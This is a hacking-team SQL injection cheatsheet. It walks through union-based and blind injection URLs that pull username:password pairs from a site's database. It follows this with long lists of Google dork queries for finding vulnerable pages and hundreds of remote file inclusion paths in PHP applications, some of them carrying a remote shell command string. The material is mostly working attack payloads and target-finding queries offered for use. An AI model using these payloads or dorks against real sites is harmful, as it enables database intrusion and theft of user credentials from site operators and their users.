###################################################
# [+]Title: [Full SQL Injections Cheatsheet]
###################################################
# [+] About :
###################################################
# Author : GlaDiaT0R | the_gl4di4t0r@hotmail.com<mailto:the_gl4di4t0r@hotmail.com>
# Team : DarkGh0st Team ( DarkGh0st.Com )
# Greetz: Boomrang_Victim, Marwen_Neo
###################################################
# [+] Summary: I*
# [1]-Introducing The SQL Injection Vuln
# [2]-Exploiting Sql Injection Vuln
# [3]-Exploiting Blind SQL Injection Vuln
###################################################
[1]* -Introducing The SQL Injection Vuln:
.SQL injection attacks are known also as SQL insertion
it's in the form of executing some querys in the database and getting acces to informations (SQL Vesion, Number & Names of tables and columns,some authentification infos,ect...)

[2]* -Exploiting Sql Injection Vuln :

.Before proceeding to the exploitation of sql injections we have to checking for this vulnerability, so we have an exemple

http://www.website.com/articles.php?id=3

for checking the vulnerability we have to add ' (quote) to the url , lets see together

http://www.website.com/articles.php?id=3'

now, if we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
this website is vulnerable to sql injection, and if we don't get anything we can't exploiting this vulnerability.
Now, Lets go to exploiting this vuln and finding some informations about this sql database


certainly before doing anything we have to find the number of columns
[-] Finding the number of columns:
for finding the number of columns we use ORDER BY to order result in the database

lets see that ,

http://www.website.com/articles.php?id=3 order by 1/*
and if we havn't any error we try to change the number

http://www.website.com/articles.php?id=3 order by 2/*

still no error,so we continu to change the number

http://www.website.com/articles.php?id=3 order by 3/*

no error to

http://www.website.com/articles.php?id=3 order by 4/*

no error

http://www.website.com/articles.php?id=3 order by 5/*

yeah , here we have this error (Unknown column '5' in 'order clause')

so, this database has 4 colmuns because the error is in the 5

now, we try to check that UNION function work or not

[-] Checking UNION function :

for using UNION function we select more informations from the database in one statment

so we try this

http://www.website.com/articles.php?id=3 union all select 1,2,3,4/* (in the end it's 4 because we have see the number of columns it's 4)

now, if we see some numbers in the page like 1 or 2 or 3 or 4 == the UNION function work

if it not work we try to change the /* to --

so we have this

http://www.website.com/articles.php?id=3 union all select 1,2,3,4--

after checking the UNION function and it works good we try to get SQL version

[-] Getting SQL Version :

now we have a number in the screen after checking the UNION

we say in example that this number is 3

so we replace 3 with @@version or version()

http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*

and now we have the version in the screen!

lets go now to get tables and columns names


[-] Getting tables and columns names :

here we have a job to do!!

if the MySQL Version is < 5 (i.e 4.1.33, 4.1.12...)

lets see that the table admin exist!

http://www.website.com/articles.php?id=3 union all select 1,2,3,4,5 from admin/*

and here we see the number 3 that we had in the screen

now, we knows that the table admin exists

here we had to check column names:

http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*

if we get an error we have to try another column name

and if it work we get username displayed on screen (example: admin,moderator,super moderator...)

after that we can check if column password exists

we have this

http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*

and oups! we see password on the screen in a hash or a text

now we have to use 0x3a for having the informations like that username:password ,dmin:unhash...

http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*


this is the sample SQL Injection , now, we will go to the blind sql injection (more difficult)


[3]* -Exploiting Blind SQL Injection Vuln :

first we should check if website is vulnerable for example

http://www.website.com/articles.php?id=3

and to test the vulnerability we had to use

http://www.website.com/articles.php?id=3 and 1=1 ( we havn't any error and the page loads normally)
and now

http://www.website.com/articles.php?id=3 and 1=2

here we have some problems with text, picture and some centents ! and it's good! this website is vulnerable for Blind SQL Injection

we have to check MySQL Version

[-] Getting MySQL Version :

we use substring in blind injection to get MySQL Version

http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=4

we should replace the 4 with 5 if the version is 5

http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=5


and now if the function select do not work we should use subselect and we should testing if it work

[-] Testing if subselect works :

http://www.website.com/articles.php?id=3 and (select 1)=1 ( if the page load normaly the subselect works good)

and now we have to see if we have access to mysql.user

http://www.website.com/articles.php?id=3 and (select 1 from mysql.user limit 0,1)=1 (if it load normaly we have access to mysql.user)

now, we can checking table and column names

[-] Checking table and column names :

http://www.website.com/articles.php?id=3 and (select 1 from users limit 0,1)=1

if the page load normaly and no errors the table users exists

now we need column name

http://www.website.com/articles.php?id=3 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page load normaly and no errors the column password exists

now we have the table and the column , yeah, we can exploiting the vunlnerability now

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

the page load normaly and no errors,so we need to change the 80 for having an error

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90

no errors ! we continu

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

Yeah!! an error

the character is char(99). we use the ascii converter and we know that char(99) is letter 'c'

to test the second character we change ,1,1 to ,2,1

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

the page load normaly

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

the page loads normally, higher !!!

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

error ! lower number

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

Error That we search!!

now, we know that the second character is char(105) and that is 'i' with the ascii converter. We have 'ci' now from the first and the second charactets

our tutorial draws to the close!

Thanks you for reading and i hope that you have understand SQL Injection and exploitations of this vulnerability .

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
(www.google.com => intitle:PHPOpenChat exthp)
/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
(www.google.com => intitle:"EasyPHPCalendar" exthp)
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/zentrack/index.php?configFile=
/pivot/modules/module_db.php?pivot_path=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/include/new-visitor.inc.php?lvc_include_dir=
/includes/header.php?systempath=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/becommunity/community/index.php?pageurl=
/shoutbox/expanded.php?conf=
/agendax/addevent.inc.php?agendax_path=
/myPHPCalendar/admin.php?cal_dir=
/yabbse/Sources/Packages.php?sourcedir=
/zboard/zboard.php
/path_of_cpcommerce/_functions.php?prefix
/dotproject/modules/projects/addedit.php?root_dir=
/dotproject/modules/projects/view.php?root_dir=
/dotproject/modules/projects/vw_files.php?root_dir=
/dotproject/modules/tasks/addedit.php?root_dir=
/dotproject/modules/tasks/viewgantt.php?root_dir=
/My_eGallery/public/displayCategory.php?basepath=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/shoutbox/expanded.php?conf=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/main.php?x=
/main.php?page=
/default.php?page=
/index.php?meio.php=
/index.php?include= | /index.php?inc= | /index.php?page= | /index.php?pag= | /index.php?p=
/index.php?x= | /index.php?open= | /index.php?open= | /index.php?visualizar= | /index.php?pagina=
/index.php?content= | /index.php?cont= | /index.php?c= | /index.php?meio= | /index.php?x=
/index.php?cat= | /index.php?site= /index.php?configFile= | /index.php?action= | /index.php?do=
/index2.php?x= | /index2.php?content= | /template.php?pagina= | /inc/step_one_tables.php?server_inc=
/GradeMap/index.php?page= | /phpshop/index.php?base_dir= | /admin.php?cal_dir=
/path_of_cpcommerce/_functions.php?prefix= | /contacts.php?cal_dir= | /convert-date.php?cal_dir=
/album_portal.php?phpbb_root_path=
/mainfile.php?MAIN_PATH=
/dotproject/modules/files/index_table.php?root_dir=
/html/affich.php?base=
/gallery/init.php?HTTP_POST_VARS=
/pm/lib.inc.php?pm_path=
/ideabox/include.php?gorumDir=
index2.php?includes_dir=
forums/toplist.php?phpbb_root_path=
forum/toplist.php?phpbb_root_path=
admin/config_settings.tpl.php?include_path=
include/common.php?include_path=
event/index.php?page=
forum/index.php?includeFooter=
forums/index.php?includeFooter=
forum/bb_admin.php?includeFooter=
forums/bb_admin.php?includeFooter=
language/lang_english/lang_activity.php?phpbb_root_path=
forum/language/lang_english/lang_activity.php?phpbb_root_path=
blend_data/blend_common.php?phpbb_root_path=
master.php?root_path=
includes/kb_constants.php?module_root_path=
forum/includes/kb_constants.php?module_root_path=
forums/includes/kb_constants.php?module_root_path=
classes/adodbt/sql.php?classes_dir=
agenda.php3?rootagenda=
agenda2.php3?rootagenda=
sources/lostpw.php?CONFIG[path]=
topsites/sources/lostpw.php?CONFIG[path]=
toplist/sources/lostpw.php?CONFIG[path]=
sources/join.php?CONFIG[path]=
topsites/sources/join.php?CONFIG[path]=
toplist/sources/join.php?CONFIG[path]=
topsite/sources/join.php?CONFIG[path]=
public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=
extras/poll/poll.php?file_newsportal=
index.php?site_path=
mail/index.php?site_path=
fclick/show.php?path=
show.php?path=
calogic/reconfig.php?GLOBALS[CLPath]=
eshow.php?Config_rootdir=
auction/auction_common.php?phpbb_root_path=
index.php?inc_dir=
calendar/index.php?inc_dir=
modules/TotalCalendar/index.php?inc_dir=
modules/calendar/index.php?inc_dir=
calendar/embed/day.php?path=
ACalendar/embed/day.php?path=
calendar/add_event.php?inc_dir=
claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=
claroline/auth/ldap/authldap.php?includePath=
docebo/modules/credits/help.php?lang=
modules/credits/help.php?lang=
config.php?returnpath=
editsite.php?returnpath=
in.php?returnpath=
addsite.php?returnpath=
includes/pafiledb_constants.php?module_root_path=
phpBB/includes/pafiledb_constants.php?module_root_path=
pafiledb/includes/pafiledb_constants.php?module_root_path=
auth/auth.php?phpbb_root_path=
auth/auth_phpbb/phpbb_root_path=
apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=
apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=
infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=
phpdig/includes/config.php?relative_script_path=
includes/phpdig/includes/config.php?relative_script_path=
includes/dbal.php?eqdkp_root_path=
eqdkp/includes/dbal.php?eqdkp_root_path=
dkp/includes/dbal.php?eqdkp_root_path=
path/include/SQuery/gameSpy2.php?libpath=
include/global.php?GLOBALS[includeBit]=
topsites/config.php?returnpath=
manager/frontinc/prepend.php?_PX_config[manager_path]=
ubbthreads/addpost_newpoll.php?addpoll=thispath=
forum/addpost_newpoll.php?thispath=
forums/addpost_newpoll.php?thispath=
ubbthreads/ubbt.inc.php?thispath=
forums/ubbt.inc.php?thispath=
forum/ubbt.inc.php?thispath=
forum/admin/addentry.php?phpbb_root_path=
admin/addentry.php?phpbb_root_path=
index.php?f=
index.php?act=
ipchat.php?root_path=
includes/orderSuccess.inc.php?glob[rootDir]=
stats.php?dir[func]=dir[base]=
ladder/stats.php?dir[base]=
ladders/stats.php?dir[base]=
sphider/admin/configset.php?settings_dir=
admin/configset.php?settings_dir=
vwar/admin/admin.php?vwar_root=
modules/vwar/admin/admin.php?vwar_root=
modules/vWar_Account/includes/get_header.php?vwar_root=
modules/vWar_Account/includes/functions_common.php?vwar_root2=
sphider/admin/configset.php?settings_dir=
admin/configset.php?settings_dir=
impex/ImpExData.php?systempath=
forum/impex/ImpExData.php?systempath=
forums/impex/ImpExData.php?systempath=
application.php?base_path=
index.php?theme_path=
become_editor.php?theme_path=
add.php?theme_path=
bad_link.php?theme_path=
browse.php?theme_path=
detail.php?theme_path=
fav.php?theme_path=
get_rated.php?theme_path=
login.php?theme_path=
mailing_list.php?theme_path=
new.php?theme_path=
modify.php?theme_path=
pick.php?theme_path=
power_search.php?theme_path=
rating.php?theme_path=
register.php?theme_path=
review.php?theme_path=
rss.php?theme_path=
search.php?theme_path=
send_pwd.php?theme_path=
sendmail.php?theme_path=
tell_friend.php?theme_path=
top_rated.php?theme_path=
user_detail.php?theme_path=
user_search.php?theme_path=
invoice.php?base_path=
cgi-bin//classes/adodbt/sql.php?classes_dir=
cgi-bin/install/index.php?G_PATH=
cgi-bin/include/print_category.php?dir=
includes/class_template.php?quezza_root_path=
bazar/classified_right.php?language_dir=
classified_right.php?language_dir=
phpBazar/classified_right.php?language_dir=
chat/messagesL.php3?cmd=
phpMyChat/chat/messagesL.php3?cmd=
bbs/include/write.php?dir=
visitorupload.php?cmd=
modules/center/admin/accounts/process.php?module_path]=
index.php?template=
armygame.php?libpath=
lire.php?rub=
pathofhostadmin/?page=
apa_phpinclude.inc.php?apa_module_basedir=
index.php?req_path=
research/boards/encapsbb-0.3.2_fixed/index_header.php?root=
Farsi1/index.php?archive=
index.php?archive=
show_archives.php?template=
forum/include/common.php?pun_root=
pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=
vuln.php?=
cgi-bin//include/write.php?dir=
admin/common.inc.php?basepath=
pm/lib.inc.php?sfx=
pm/lib.inc.php?pm_path=
artmedic-kleinanzeigen-path/index.php?id=
index.php?pagina=
osticket/include/main.php?include_dir=
include/main.php?config[search_disp]=include_dir=
phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
quick_reply.php?phpbb_root_path=
zboard/include/write.php?dir=
PATH/admin/plog-admin-functions.php?configbasedir=
path_to_phpgreetz/content.php?content=
path_to_qnews/q-news.php?id=
_conf/core/common-tpl-vars.php?confdir=
votebox.php?VoteBoxPath=
al_initialize.php?alpath=
include/db.php?GLOBALS[rootdp]=
modules/news/archivednews.php?GLOBALS[language_home]=
protection.php?siteurl=
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
index2.php?includes_dir=
classes.php?LOCAL_PATH=
extensions/moblog/moblog_lib.php?basedir=
modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
phpWebLog/include/init.inc.php?G_PATH=
admin/objects.inc.php4?Server=
trg_news30/trgnews/install/article.php?dir=
block.php?Include=
arpuivo.php?data=
path_to_gallery/setup/index.php?GALLERY_BASEDIR=
include/help.php?base=
index.php?[Home]=
path_to_script/block.php?Include=
examples/phonebook.php?page=
PHPNews/auth.php?path=
include/print_category.php?dir=
skin/zero_vote/login.php?dir=
skin/zero_vote/setup.php?dir=
skin/zero_vote/ask_password.php?dir=
gui/include/sql.php?include_path=
webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=
email.php?login=cer_skin=
PhotoGal/ops/gals.php?news_file=
index.php?custom=
loginout.php?cutepath=
oneadmin/config.php?path[docroot]=
xcomic/initialize.php?xcomicRootPath=
skin/zero_vote/setup.php?dir=
skin/zero_vote/error.php? dir=
admin_modules/admin_module_captions.inc.php?config[path_src_include]=
admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
admin_modules/admin_module_edit.inc.php?config[path_src_include]=
admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
src/index_overview.inc.php?config[path_src_include]=
src/index_leftnavbar.inc.php?config[path_src_include]=
src/index_image.inc.php?config[path_src_include]=
src/image-gd.class.php?config[path_src_include]=
src/image.class.php?config[path_src_include]=
src/album.class.php?config[path_src_include]=
src/show_random.inc.php?config[path_src_include]=
src/main.inc.php?config[path_src_include]=
src/index_passwd-admin.inc.php?config[path_admin_include]=
yappa-ng/src/index_overview.inc.php?config[path_src_include]=
admin_modules/admin_module_captions.inc.php?config[path_src_include]=
admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
admin_modules/admin_module_edit.inc.php?config[path_src_include]=
admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
src/index_overview.inc.php?config[path_src_include]=
src/image-gd.class.php?config[path_src_include]=
src/image.class.php?config[image_module]=
src/album.class.php?config[path_src_include]=
src/show_random.inc.php?config[path_src_include]=
src/main.inc.php?config[path_src_include]=
includes/db_adodb.php?baseDir=
includes/db_connect.php?baseDir=
includes/session.php?baseDir=
modules/projects/gantt.php?dPconfig[root_dir]=
modules/projects/gantt2.php?dPconfig[root_dir]=
modules/projects/vw_files.php?dPconfig[root_dir]=
modules/admin/vw_usr_roles.php?baseDir=
modules/public/calendar.php?baseDir=
modules/public/date_format.php?baseDir=
modules/tasks/gantt.php?baseDir=
mantis/login_page.php?g_meta_include_file=
phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=
modules/My_eGallery/public/displayCategory.php?basepath=
dotproject/modules/files/index_table.php?root_dir=
nukebrowser.php?filnavn=
bug_sponsorship_list_view_inc.php?t_core_path=
modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
modules/coppermine/themes/maze/theme.php?THEME_DIR=
modules/coppermine/include/init.inc.php?CPG_M_DIR=
includes/calendar.php?phpc_root_path=
includes/setup.php?phpc_root_path=
phpBB/admin/admin_styles.php?mode=
aMember/plugins/db/mysql/mysql.inc.php?config=
admin/lang.php?CMS_ADMIN_PAGE=
inc/pipe.php?HCL_path=
include/write.php?dir=
becommunity/community/index.php?pageurl=
modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
modules/mod_mainmenu.php?mosConfig_absolute_path=
modules/agendax/addevent.inc.php?agendax_path=
shoutbox/expanded.php?conf=
modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
index.php?page=
index.php?pag=
index.php?include=
index.php?content=
index.php?cont=
index.php?c=
modules/My_eGallery/index.php?basepath=
modules/newbb_plus/class/forumpollrenderer.php?bbPath=
journal.php?m=
index.php?m=
links.php?c=
forums.php?m=
list.php?c=
user.php?xoops_redirect=
index.php?id=
r.php?url=
CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=
inc/formmail.inc.php?script_root=
include/init.inc.php?G_PATH=
backend/addons/links/index.php?PATH=
modules/newbb_plus/class/class.forumposts.php?bbPath[path]=
modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
protection.php?siteurl=
htmltonuke.php?filnavn=
mail_autocheck.php?pm_path=
index.php?p=
modules/4nAlbum/public/displayCategory.php?basepath=
e107/e107_handlers/secure_img_render.php?p=
include/new-visitor.inc.php?lvc_include_dir=
path_of_cpcommerce/_functions.php?prefix=
community/modules/agendax/addevent.inc.php?agendax_path=
library/editor/editor.php?root=
library/lib.php?root=
zentrack/index.php?configFile=
pivot/modules/module_db.php?pivot_path=
main.php?x=
myPHPCalendar/admin.php?cal_dir=
index.php/main.php?x=
index.php?x=
index.php?open=
index.php?visualizar=
template.php?pagina=
index.php?inc=
includes/include_onde.php?include_file=
index.php?pg=
index.php?show=
index.php?cat=
print.php?val1=
cmd.php?function=
iframe.php?file=
os/pointer.php?url=
p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=
index.php?file=
db.php?path_local=
phpGedView/individual.php?PGV_BASE_DIRECTORY=
index.php?kietu[url_hit]=
phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
Sources/Packages.php?sourcedir=
yabbse/Sources/Packages.php?sourcedir=
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
cgi-bin//gadgets/Blog/BlogModel.php?path=
cgi-bin//admin.php?cal_dir=
gallery/captionator.php?GALLERY_BASEDIR=
cgi-bin/main.php?x=
Blog/BlogModel.php?path=
admin.php?cal_dir=
expanded.php?conf=
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
pollvote/pollvote.php?pollname=
displayCategory.php?basepath=
phpBB2/admin/admin_cash.php?phpbb_root_path=
modules/foro/includes/functions_admin.php?phpbb_root_path=
modules/Forums/admin/admin_forums.php?phpEx=
modules/Forums/admin/admin_disallow.php?phpEx=
modules/Forums/admin/admin_smilies.php?phpEx=
modules/Forums/admin/admin_board.php?phpEx=
modules/Forums/admin/admin_users.php?phpEx=
modules/Forums/admin/admin_mass_email.php?phpEx=
modules/Forums/admin/admin_forum_prune.php?phpEx=
modules/Forums/admin/admin_styles.php?phpbb_root_path=
index.php?hc=
mt-comments.cgi?id=
webcalendar/tools/send_reminders.php?includedir=
cmd/product_info.php/products_id/1622/shop_content.php?coID=
addevent.inc.php?agendax_path=
step_one.php?server_inc=
upgrade_album.php?GALLERY_BASEDIR=
search.php?cutepath=
modules.php?name=
wagora/extras//quicklist.php?site=
vCard/admin/define.inc.php?match=
forum/ubbthreads.php?Cat=
admin/includes/classes/spaw/spaw_control.class.php?spaw_root=
secure.php?cfgProgDir=
modules/My_eGallery/public//inc/?HCL_path=
modules/My_eGallery/public/imagen.php?basepath=
adlayer.php?layerstyle=
Forums/bb_smilies.php?name=
modules/Forums/bb_smilies.php?name=
gadgets/Blog/BlogModel.php?path=
learnlinc/clmcpreload.php?CLPATH=
modernbill/samples/news.php?DIR=
religions/faq.php?page=
forum/viewtopic.php?t=
announcements.php?includePath=
inc/header.php/step_one.php?server_inc=
phpatm/index.php?include_location=
gb/form.inc.php3?lang=
shannen/index.php?x=
family/phpgedview/index.php?PGV_BASE_DIRECTORY=
main.php?left=
forum/misc.php?action=
nucleus/libs/globalfunctions.php?DIR_LIBS=
show_archives.php?cutepath=
gallery.php=
magicforum/misc.php?action=
forum/admin/actions/del.php?include_path=
index.php?meio=
local/investing_industrialeastate1.php?a=
modules/coppermine/themes/default/theme.php?THEME_DIR
Popper/index.php?childwindow.inc.php?form=
class.mysql.php?path_to_bt_dir=
